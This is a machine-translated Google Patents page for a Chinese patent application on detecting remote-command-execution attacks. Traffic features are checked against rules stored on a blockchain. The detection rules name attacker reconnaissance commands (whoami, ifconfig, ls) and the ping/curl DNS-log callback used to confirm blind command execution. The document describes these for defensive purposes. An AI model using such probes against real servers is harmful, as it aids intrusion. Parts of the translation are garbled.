CN114969727A - Attack behavior identification method, device and equipment based on block chain - Google Patents
Attack behavior identification method, device and equipment based on block chain Download PDFInfo
- Publication number
- CN114969727A CN114969727A CN202210609256.7A CN202210609256A CN114969727A CN 114969727 A CN114969727 A CN 114969727A CN 202210609256 A CN202210609256 A CN 202210609256A CN 114969727 A CN114969727 A CN 114969727A
- Authority
- CN
- China
- Prior art keywords
- server
- data
- interaction
- external device
- communication data
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 238000000034 method Methods 0.000 title claims abstract description 39
- 230000003993 interaction Effects 0.000 claims abstract description 45
- 238000004891 communication Methods 0.000 claims abstract description 37
- 230000004044 response Effects 0.000 claims description 46
- 230000006399 behavior Effects 0.000 claims description 41
- 238000001514 detection method Methods 0.000 claims description 17
- 238000004590 computer program Methods 0.000 claims description 13
- 238000000605 extraction Methods 0.000 claims description 5
- 230000002452 interceptive effect Effects 0.000 claims 1
- 230000006872 improvement Effects 0.000 description 8
- 238000012545 processing Methods 0.000 description 5
- 238000010586 diagram Methods 0.000 description 4
- 230000008569 process Effects 0.000 description 4
- 230000005540 biological transmission Effects 0.000 description 3
- 230000006870 function Effects 0.000 description 3
- 238000005516 engineering process Methods 0.000 description 2
- 230000008520 organization Effects 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 1
- 230000000903 blocking effect Effects 0.000 description 1
- 230000001413 cellular effect Effects 0.000 description 1
- 238000010276 construction Methods 0.000 description 1
- 230000007547 defect Effects 0.000 description 1
- 238000013461 design Methods 0.000 description 1
- ZXQYGBMAQZUVMI-GCMPRSNUSA-N gamma-cyhalothrin Chemical compound CC1(C)[C@@H](\C=C(/Cl)C(F)(F)F)[C@H]1C(=O)O[C@H](C#N)C1=CC=CC(OC=2C=CC=CC=2)=C1 ZXQYGBMAQZUVMI-GCMPRSNUSA-N 0.000 description 1
- 230000005055 memory storage Effects 0.000 description 1
- 238000010295 mobile communication Methods 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 238000011022 operating instruction Methods 0.000 description 1
- 230000003287 optical effect Effects 0.000 description 1
- 230000000750 progressive effect Effects 0.000 description 1
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/57—Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
- G06F21/577—Assessing vulnerabilities and evaluating computer system security
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/60—Protecting data
- G06F21/64—Protecting data integrity, e.g. using checksums, certificates or signatures
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Theoretical Computer Science (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Software Systems (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Computing Systems (AREA)
- Health & Medical Sciences (AREA)
- Bioethics (AREA)
- General Health & Medical Sciences (AREA)
- Computer And Data Communications (AREA)
Abstract
The embodiment of the specification discloses an attack behavior identification method, device and equipment based on a block chain. The method comprises the following steps: capturing communication data of the server and external equipment during interaction in real time; extracting corresponding kinds of feature data from communication data according to the interaction types; according to the interaction type, inquiring a safety rule of a corresponding type from a block chain; and detecting the characteristic data by adopting the safety rule so as to identify whether the interaction belongs to an attack behavior. The embodiment of the specification can detect whether the interaction behavior between the server and the external device belongs to the attack behavior in real time, and improves the safety.
Description
Technical Field
The embodiment of the specification relates to the technical field of block chains, in particular to an attack behavior identification method, device and equipment based on the block chains.
Background
The network attack is to attack the system and resources by using the loopholes and security defects existing in the network information system.
In recent years, network attack events are frequent, and trojan horse, worm and lasso software on the internet are layered endlessly, which poses serious threats to network security. How to accurately identify the attack behavior is a technical problem which needs to be solved urgently at present.
Disclosure of Invention
Embodiments of the present specification provide an attack behavior identification method, apparatus, and device based on a blockchain, so as to detect whether an interaction behavior between a server and an external device belongs to an attack behavior in real time, thereby improving security of the server.
In a first aspect of the embodiments of the present specification, a method for identifying an attack behavior based on a blockchain is provided, which is applied to a server, and includes:
capturing communication data of the server and external equipment during interaction in real time;
extracting corresponding kinds of feature data from communication data according to the interaction types;
according to the interaction type, inquiring a safety rule of a corresponding type from a block chain;
and detecting the characteristic data by adopting the safety rule so as to identify whether the interaction belongs to an attack behavior.
In a second aspect of the embodiments of the present specification, there is provided an attack behavior recognition apparatus based on a blockchain, which is applied to a server, and includes:
the capturing unit is used for capturing communication data of the server and the external equipment during interaction in real time;
the extraction unit is used for extracting the feature data of the corresponding type from the communication data according to the type of the interaction;
the query unit is used for querying the safety rules of corresponding types from the block chain according to the interaction types;
and the detection unit is used for detecting the characteristic data by adopting the safety rule so as to identify whether the interaction belongs to an attack behavior.
In a third aspect of the embodiments of the present specification, there is provided a computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, the processor implementing the method steps as described in the first aspect when executing the computer program.
A fourth aspect of embodiments of the present specification provides a computer program product comprising a computer program which, when executed by a processor, performs the method steps of the first aspect.
According to the technical scheme provided by the embodiment of the specification, the communication data of the server and the external equipment during interaction are captured in real time; and according to the interaction type, acquiring the corresponding type of characteristic data and security rules to detect whether the interaction behavior between the server and the external equipment belongs to attack behavior in real time, thereby improving the security of the server and reducing the false alarm rate.
Drawings
In order to more clearly illustrate the embodiments of the present specification or the technical solutions in the prior art, the drawings used in the description of the embodiments or the prior art will be briefly introduced below, the drawings in the following description are only some embodiments described in the present specification, and for those skilled in the art, other drawings can be obtained according to the drawings without creative efforts.
FIG. 1 is a block diagram of a data processing system according to an embodiment of the present disclosure;
fig. 2 is a schematic flowchart of an attack behavior identification method based on a blockchain in an embodiment of the present disclosure;
fig. 3 is a schematic flowchart of an attack behavior identification method based on a blockchain in an embodiment of the present disclosure;
fig. 4 is a schematic structural diagram of an attack behavior recognition apparatus based on a blockchain in an embodiment of the present specification;
fig. 5 is a schematic structural diagram of a computer device in an embodiment of the present specification.
Detailed Description
The technical solutions in the embodiments of the present disclosure will be clearly and completely described below with reference to the drawings in the embodiments of the present disclosure, and it is obvious that the described embodiments are only a part of the embodiments of the present disclosure, and not all of the embodiments. All other embodiments obtained by a person skilled in the art based on the embodiments in the present specification without any inventive step should fall within the scope of protection of the present specification.
The RCE vulnerability, namely the remote command execution vulnerability, is because developers write source codes and do not filter executable special function entries in the codes, so that a client can submit malicious construction statements to be submitted and delivered to a server side to be executed. Attacks against RCE vulnerabilities tend to be very disruptive. Moreover, some RCE vulnerabilities, such as the 0Day vulnerability, have strong privacy. No one knows the attack pattern for the RCE vulnerability. The existing attack behavior detection method is difficult to detect.
The inventor finds that the attack behavior aiming at the RCE vulnerability has the following characteristics: (1) attackers often use several specific types of commands, whoami, ifconfig, ls, etc., when obtaining server rights. These commands are often used less often in normal business processes. (2) Sometimes, when an attacker encounters an RCE vulnerability that cannot be echoed, the attacker cannot know whether a command is executed on a victim server, and uses commands such as ping and curl to request a server of dnstl. Based on the above consideration, embodiments of the present specification provide an attack behavior identification method based on a blockchain, so as to identify whether an attacker initiates an attack behavior on an RCE vulnerability of a server through an external device.
Please refer to fig. 1. The embodiment of the specification provides a data processing system. The data processing system may include a terminal device and a blockchain network. The terminal device may be a security administrator-oriented device. The terminal device includes but is not limited to a smart phone, a tablet electronic device, a portable computer, a desktop computer, a smart wearable device, and the like. The blockchain network may include a plurality of node devices. The plurality of node apparatuses may be set up by one organization. The blockchain network may be a private chain of the organization. Alternatively, the plurality of node apparatuses may also be set up by a plurality of organizations. The blockchain network may be a federation chain of the plurality of enterprises. The institution may include a banking institution or the like. The node device may include a server or the like.
The embodiment of the specification provides an attack behavior identification method based on a block chain. The method may be applied to a server. The server may join the blockchain network as a node device.
Please refer to fig. 2 and fig. 3. The method may include the following steps.
Step S11: and capturing communication data of the server and the external device during interaction in real time.
In some embodiments, the external device may be a device capable of communicating with the server, including but not limited to a smartphone, a tablet electronic device, a portable computer, a desktop computer, a smart wearable device, and the like.
In some embodiments, the types of interactions between the server and the external device may include: the external device sends an access request to the server, the server feeds back a response to the external device, the server sends the access request to the external device, and the external device feeds back a response to the server. Accordingly, the communication data of the server and the external device when interacting may include: the method comprises the steps that a first request packet when the external device sends an access request to the server, a first response packet fed back by the server to the external device, a second request packet when the server sends the access request to the external device, and a second response packet fed back by the external device to the server.
In some embodiments, the traffic of the server may be monitored in real time. When the server interacts with the external equipment, the communication data is captured and analyzed so as to identify whether the interaction belongs to an attack behavior.
Step S13: and extracting corresponding kinds of feature data from the communication data according to the types of the interaction.
In some embodiments, the correspondence between the interaction type and the feature extraction manner may be set in advance; acquiring a corresponding feature extraction mode according to the type of the interaction; the corresponding kind of feature data can be extracted from the communication data according to the obtained feature extraction mode. Extracting the feature data of the corresponding kind from the communication data may include the following 4 cases.
In case one, the attacker often uses several specific types of commands, such as whoami, ifconfig, ls, etc., in obtaining the server rights. Accordingly, for an external device to send an access request to the server, the system command may be extracted from the first request packet.
In case (ii), the first response data may be extracted from the first response packet for the server feeding back the response to the external device.
In case (iii), when an attacker encounters an RCE vulnerability that cannot be revealed back, the attacker cannot know whether a command is executed on the victim server, and requests a server of dnlog using commands such as ping and curl. Therefore, for the server to send an access request to the external device, the address of the external device may be extracted from the second request packet.
In case (d), the second response data may be extracted from the second response packet for the response fed back to the server by the external device.
Step S15: and inquiring the safety rules of corresponding types from the block chain according to the interaction types.
In some embodiments, a variety of security rules may be pre-stored in the blockchain. Different kinds of security rules correspond to different interaction types. The query of the corresponding kind of security rules from the blockchain may specifically include the following 4 cases.
In case (one), the security rule may include a set of sensitive commands for an external device to send an access request to a server. At least one sensitive command may be included in the set of sensitive commands. The sensitive commands may be obtained by pre-collection. The sensitive commands may include system commands that are commonly used by attackers but not commonly used by normal traffic systems, such as whoami, ifconfig, ls, and the like.
In case (two), the security rule may include a first set of response data types for the server to feed back the response to the external device. The first set of response data types may include at least one response data type. The response data type may include a type of response data corresponding to the sensitive command. For example, the sensitive command may be whoami and the corresponding response data type may include a username. For another example, the sensitive command may be ifconfig, and the corresponding response data type may include network card information. As another example, the sensitive command may be ls and the corresponding response data type may include a file directory.
Case (three), the security rule may include a set of sensitive addresses for the server to send an access request to the external device. The set of sensitive addresses may include at least one sensitive address. The sensitive address may include an IP address or the like.
In case (iv), the security rule may include a second set of response data types for the response fed back to the server by the external device. The second set of response data types may include at least one response data type. The response data type may include a type of response data corresponding to the detection command. For example, the detection command may include a ping, curl, or the like.
Step S17: and detecting the characteristic data by adopting the safety rule so as to identify whether the interaction belongs to an attack behavior.
In some embodiments, it may be detected whether the extracted system command is located in the command set, resulting in a first detection result. If the first detection result is yes, the fact that the access request sent by the external equipment to the server belongs to the attack behavior can be determined; the communication data may be intercepted. If the first detection result is negative, the external device can be determined not to send the access request to the server, and the attack behavior is not determined; the communication data may be cleared.
In some embodiments, it may be detected whether the type of the first response data is located in the first set of response data types, resulting in a second detection result. If the second detection result is yes, the server can be determined to feed back a response to the external device, and the response belongs to an attack behavior; (ii) a The communication data may be intercepted. If the second detection result is negative, the server can be determined that the response fed back to the external equipment does not belong to the attack behavior; the communication data may be cleared.
In some embodiments, it may be detected whether the address of the external device is located in the sensitive address set, resulting in a third detection result. If the third detection result is yes, the server can be determined to send the access request to the external device, and the attack behavior is determined; the communication data may be intercepted. If the third detection result is negative, the server can be determined not to send the access request to the external equipment, and the attack behavior is not determined; the communication data may be cleared.
In some embodiments, it may be detected whether the type of the second response data is located in the second response data type set, resulting in a fourth detection result. If the fourth detection result is yes, it can be determined that the response fed back to the server by the external device belongs to the attack behavior; the communication data may be intercepted. If the fourth detection result is negative, the fact that the response fed back to the server by the external equipment does not belong to the attack behavior can be determined; the communication data may be cleared.
In some embodiments, the security administrator's user information and the rights it owns may be maintained in the blockchain. The user information may include a name, an identification card number, a mobile phone number, and the like. If the interaction belongs to an attack behavior, the server can generate a first 5G message; and sending a first 5G message to the terminal equipment corresponding to the security administrator according to the user information. The first 5G message is used for prompting that the interaction belongs to an attack behavior. The terminal device may receive a first 5G message; a first 5G message may be presented. The security administrator can click on the chatbot component in the first 5G message to view the early warning information.
The security administrator can input operation instructions such as passing through the interaction, blocking IP addresses, intercepting data packets of the same type and the like into the terminal equipment. The terminal can receive an operation instruction input by a security administrator; the operating instructions may be sent to a server. The server can receive the operation instruction; corresponding operations can be executed on the interaction according to the operation instruction. In practical application, the terminal device may directly send an operation instruction to the server. The server may receive the operation instruction directly. Or, the terminal device may further generate a second 5G message according to the operation instruction; a second 5G message may be sent to the server. The server may receive a second 5G message; the second 5G message may be parsed to obtain the operation instruction.
In the method for detecting an abnormal file of a block chain in the embodiment of the description, communication data of a server and external equipment during interaction are captured in real time; and according to the interaction type, acquiring the corresponding type of characteristic data and security rules to detect whether the interaction behavior between the server and the external equipment belongs to attack behavior in real time, thereby improving the security of the server and reducing the false alarm rate.
Please refer to fig. 4. The embodiment of the specification provides a data processing device based on a block chain, which comprises the following units.
A capturing unit 21, configured to capture, in real time, communication data of the server and the external device during interaction;
an extracting unit 23, configured to extract feature data of a corresponding type from communication data according to the type of the interaction;
the query unit 24 is configured to query the security rule of the corresponding type from the block chain according to the type of the interaction;
a detecting unit 27, configured to detect the feature data by using the security rule, so as to identify whether the interaction belongs to an attack behavior.
One embodiment of a computer apparatus of the present specification is described below. Fig. 5 is a hardware configuration diagram of the computer device in this embodiment. As shown in fig. 5, the computer device may include one or more processors (only one of which is shown), memory, and a transmission module. Of course, those skilled in the art will appreciate that the hardware configuration shown in fig. 5 is only an illustration, and is not intended to limit the hardware configuration of the computer device. In practice the computer device may also comprise more or fewer component elements than those shown in fig. 5; or have a different configuration than that shown in figure 5.
The memory may comprise high speed random access memory; alternatively, non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory may also be included. Of course, the memory may also comprise a remotely located network memory. The memory may be used to store program instructions or modules of application software, such as the program instructions or modules of the corresponding embodiments of fig. 2 of this specification.
The processor may be implemented in any suitable way. For example, the processor may take the form of, for example, a microprocessor or processor and a computer-readable medium that stores computer-readable program code (e.g., software or firmware) executable by the (micro) processor, logic gates, switches, an Application Specific Integrated Circuit (ASIC), a programmable logic controller and embedded microcontroller, and so forth. The processor may read and execute the program instructions or modules in the memory.
The transmission module may be used for data transmission via a network, for example via a network such as the internet, an intranet, a local area network, a mobile communication network, etc.
This specification also provides one embodiment of a computer program product. The computer program product may include a computer storage medium. The computer storage medium includes, but is not limited to, a Random Access Memory (RAM), a Read-Only Memory (ROM), a Cache (Cache), a Hard Disk (HDD), a Memory Card (Memory Card), and the like. The computer storage medium stores computer program instructions. The computer program instructions when executed implement: the program instructions or modules of the embodiments corresponding to fig. 2 in this description.
It should be noted that, in the present specification, each embodiment is described in a progressive manner, and the same or similar parts in each embodiment may be referred to each other, and each embodiment focuses on differences from other embodiments. In particular, apparatus embodiments, computer device embodiments, and computer program product embodiments are substantially similar to method embodiments and therefore are described with relative ease, where reference may be made to some of the descriptions of the method embodiments. In addition, it is understood that one skilled in the art, after reading this specification document, may conceive of any combination of some or all of the embodiments listed in this specification without the need for inventive faculty, which combinations are also within the scope of the disclosure and protection of this specification.
In the 90 s of the 20 th century, improvements in a technology could clearly distinguish between improvements in hardware (e.g., improvements in circuit structures such as diodes, transistors, switches, etc.) and improvements in software (improvements in process flow). However, as technology advances, many of today's process flow improvements have been seen as direct improvements in hardware circuit architecture. Designers almost always obtain the corresponding hardware circuit structure by programming an improved method flow into the hardware circuit. Thus, it cannot be said that an improvement in the process flow cannot be realized by hardware physical modules. For example, a Programmable Logic Device (PLD), such as a Field Programmable Gate Array (FPGA), is an integrated circuit whose Logic functions are determined by programming the Device by a user. A digital system is "integrated" on a PLD by the designer's own programming without requiring the chip manufacturer to design and fabricate application-specific integrated circuit chips. Furthermore, nowadays, instead of manually making an Integrated Circuit chip, such Programming is often implemented by "logic compiler" software, which is similar to a software compiler used in program development and writing, but the original code before compiling is also written by a specific Programming Language, which is called Hardware Description Language (HDL), and HDL is not only one but many, such as abel (advanced Boolean Expression Language), ahdl (alternate Hardware Description Language), traffic, pl (core universal Programming Language), HDCal (jhdware Description Language), lang, Lola, HDL, laspam, hardward Description Language (vhr Description Language), vhal (Hardware Description Language), and vhigh-Language, which are currently used in most common. It will also be apparent to those skilled in the art that hardware circuitry for implementing the logical method flows can be readily obtained by a mere need to program the method flows with some of the hardware description languages described above and into an integrated circuit.
The systems, devices, modules or units illustrated in the above embodiments may be implemented by a computer chip or an entity, or by a product with certain functions. One typical implementation device is a computer. In particular, the computer may be, for example, a personal computer, a laptop computer, a cellular telephone, a camera phone, a smartphone, a personal digital assistant, a media player, a navigation device, an email device, a game console, a tablet computer, a wearable device, or a combination of any of these devices. From the above description of the embodiments, it is clear to those skilled in the art that the present specification can be implemented by software plus a necessary general hardware platform. Based on such understanding, the technical solutions of the present specification may be essentially or partially implemented in the form of software products, which may be stored in a storage medium, such as ROM/RAM, magnetic disk, optical disk, etc., and include instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to execute the methods described in the embodiments or some parts of the embodiments of the present specification. The description is operational with numerous general purpose or special purpose computing system environments or configurations. For example: personal computers, server computers, hand-held or portable devices, tablet-type devices, multiprocessor systems, microprocessor-based systems, set top boxes, programmable consumer electronics, network PCs, minicomputers, mainframe computers, distributed computing environments that include any of the above systems or devices, and the like.
This description may be described in the general context of computer-executable instructions, such as program modules, being executed by a computer. Generally, program modules include routines, programs, objects, components, data structures, etc. that perform particular tasks or implement particular abstract data types. The specification may also be practiced in distributed computing environments where tasks are performed by remote processing devices that are linked through a communications network. In a distributed computing environment, program modules may be located in both local and remote computer storage media including memory storage devices. While the specification has been described with examples, those skilled in the art will appreciate that there are numerous variations and permutations of the specification that do not depart from the spirit of the specification, and it is intended that the appended claims include such variations and modifications that do not depart from the spirit of the specification.
Claims (13)
1. An attack behavior identification method based on a block chain is applied to a server and comprises the following steps:
capturing communication data of the server and external equipment during interaction in real time;
extracting corresponding kinds of feature data from communication data according to the interaction types;
according to the interaction type, inquiring a safety rule of a corresponding type from a block chain;
and detecting the characteristic data by adopting the safety rule so as to identify whether the interaction belongs to an attack behavior.
2. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a first request packet when an external device sends an access request to a server;
the extracting of the feature data of the corresponding category from the communication data includes:
a system command is extracted from the first request packet.
3. The method of claim 2, the querying for the respective class of security rules from the blockchain comprising:
querying a sensitive command set from a blockchain;
the detecting the feature data by using the security rule includes:
detecting whether the extracted system command is located in the command set.
4. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a first response packet fed back by the server to the external device;
the extracting of the feature data of the corresponding category from the communication data includes:
first response data is extracted from the first response packet.
5. The method of claim 4, the querying for the respective class of security rules from the blockchain, comprising:
querying a first set of response data types from the blockchain;
the detecting the feature data by using the security rule includes:
detecting whether the type of the first response data is in the first set of response data types.
6. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a second request packet when the server sends an access request to the external device;
the extracting of the feature data of the corresponding category from the communication data includes:
extracting an address of an external device from the second request packet.
7. The method of claim 6, the querying for the respective class of security rules from the blockchain, comprising:
inquiring a sensitive address set from a block chain;
the detecting the feature data by using the security rule includes:
detecting whether an address of an external device is located in the set of sensitive addresses.
8. The method of claim 1, the capturing communication data of the server and the external device when interacting, comprising:
capturing a second response packet fed back to the server by the external device;
the extracting of the feature data of the corresponding category from the communication data includes:
second response data is extracted from the second response packet.
9. The method of claim 8, the querying for the respective class of security rules from the blockchain, comprising:
querying a second set of response data types from the blockchain;
the detecting the feature data by adopting the security rule includes:
detecting whether the type of the second response data is in the second set of response data types.
10. The method of claim 1, further comprising:
generating a 5G message, wherein the 5G message is used for prompting that the interactive behavior belongs to an attack behavior;
and sending the 5G message to the terminal equipment.
11. An attack behavior recognition device based on a blockchain is applied to a server and comprises:
the capturing unit is used for capturing communication data of the server and the external equipment during interaction in real time;
the extraction unit is used for extracting the feature data of the corresponding type from the communication data according to the type of the interaction;
the query unit is used for querying the safety rules of corresponding types from the block chain according to the interaction types;
and the detection unit is used for detecting the characteristic data by adopting the safety rule so as to identify whether the interaction belongs to an attack behavior.
12. A computer device comprising a memory, a processor and a computer program stored on the memory and executable on the processor, the processor implementing the method of any one of claims 1 to 10 when executing the computer program.
13. A computer program product comprising a computer program which, when executed by a processor, implements the method of any one of claims 1 to 10.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210609256.7A CN114969727A (en) | 2022-05-31 | 2022-05-31 | Attack behavior identification method, device and equipment based on block chain |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210609256.7A CN114969727A (en) | 2022-05-31 | 2022-05-31 | Attack behavior identification method, device and equipment based on block chain |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN114969727A true CN114969727A (en) | 2022-08-30 |
Family
ID=82956948
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202210609256.7A Pending CN114969727A (en) | 2022-05-31 | 2022-05-31 | Attack behavior identification method, device and equipment based on block chain |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN114969727A (en) |
Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN107580005A (en) * | 2017-11-01 | 2018-01-12 | 北京知道创宇信息技术有限公司 | Website protection method, device, website safeguard and readable storage medium storing program for executing |
| US20180349602A1 (en) * | 2017-06-06 | 2018-12-06 | Sap Se | Security testing framework including virtualized server-side platform |
| CN110266669A (en) * | 2019-06-06 | 2019-09-20 | 武汉大学 | A method and system for general detection and location of Java Web framework vulnerability attacks |
| CN110545269A (en) * | 2019-08-22 | 2019-12-06 | 西安四叶草信息技术有限公司 | Access control method, device and storage medium |
| US20200213359A1 (en) * | 2018-12-28 | 2020-07-02 | Imperva, Inc. | Generating collection rules based on security rules |
| CN111416818A (en) * | 2020-03-17 | 2020-07-14 | 北京金山云网络技术有限公司 | Website security protection method and device and server |
-
2022
- 2022-05-31 CN CN202210609256.7A patent/CN114969727A/en active Pending
Patent Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20180349602A1 (en) * | 2017-06-06 | 2018-12-06 | Sap Se | Security testing framework including virtualized server-side platform |
| CN107580005A (en) * | 2017-11-01 | 2018-01-12 | 北京知道创宇信息技术有限公司 | Website protection method, device, website safeguard and readable storage medium storing program for executing |
| US20200213359A1 (en) * | 2018-12-28 | 2020-07-02 | Imperva, Inc. | Generating collection rules based on security rules |
| CN110266669A (en) * | 2019-06-06 | 2019-09-20 | 武汉大学 | A method and system for general detection and location of Java Web framework vulnerability attacks |
| CN110545269A (en) * | 2019-08-22 | 2019-12-06 | 西安四叶草信息技术有限公司 | Access control method, device and storage medium |
| CN111416818A (en) * | 2020-03-17 | 2020-07-14 | 北京金山云网络技术有限公司 | Website security protection method and device and server |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US10489583B2 (en) | Detecting malicious files | |
| US11797677B2 (en) | Cloud based just in time memory analysis for malware detection | |
| RU2610254C2 (en) | System and method of determining modified web pages | |
| Andronio et al. | Heldroid: Dissecting and detecting mobile ransomware | |
| US10140451B2 (en) | Detection of malicious scripting language code in a network environment | |
| US9596257B2 (en) | Detection and prevention of installation of malicious mobile applications | |
| EP3756121B1 (en) | Anti-ransomware systems and methods using a sinkhole at an electronic device | |
| US7934261B1 (en) | On-demand cleanup system | |
| US8453244B2 (en) | Server, user device and malware detection method thereof | |
| EP3270317B1 (en) | Dynamic security module server device and operating method thereof | |
| US11693961B2 (en) | Analysis of historical network traffic to identify network vulnerabilities | |
| US20210194915A1 (en) | Identification of potential network vulnerability and security responses in light of real-time network risk assessment | |
| US20250039191A1 (en) | Visualization tool for real-time network risk assessment | |
| CN106415577B (en) | System and method for identifying the source of a suspicious event | |
| US11809556B2 (en) | System and method for detecting a malicious file | |
| Ahmed et al. | Survey of Keylogger technologies | |
| JP2009223375A (en) | Malicious web site decision device, malicious web site decision system, method thereof, and program | |
| CN106250761B (en) | Equipment, device and method for identifying web automation tool | |
| US11886585B1 (en) | System and method for identifying and mitigating cyberattacks through malicious position-independent code execution | |
| KR101983997B1 (en) | System and method for detecting malignant code | |
| CN111177726A (en) | A system vulnerability detection method, device, equipment and medium | |
| CN114969727A (en) | Attack behavior identification method, device and equipment based on block chain | |
| US20210064662A1 (en) | Data collection system for effectively processing big data | |
| KR20180106430A (en) | Network and host-based malware infection prevention system | |
| CN117914848A (en) | Method, device, electronic device and storage medium for transferring files across networks |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |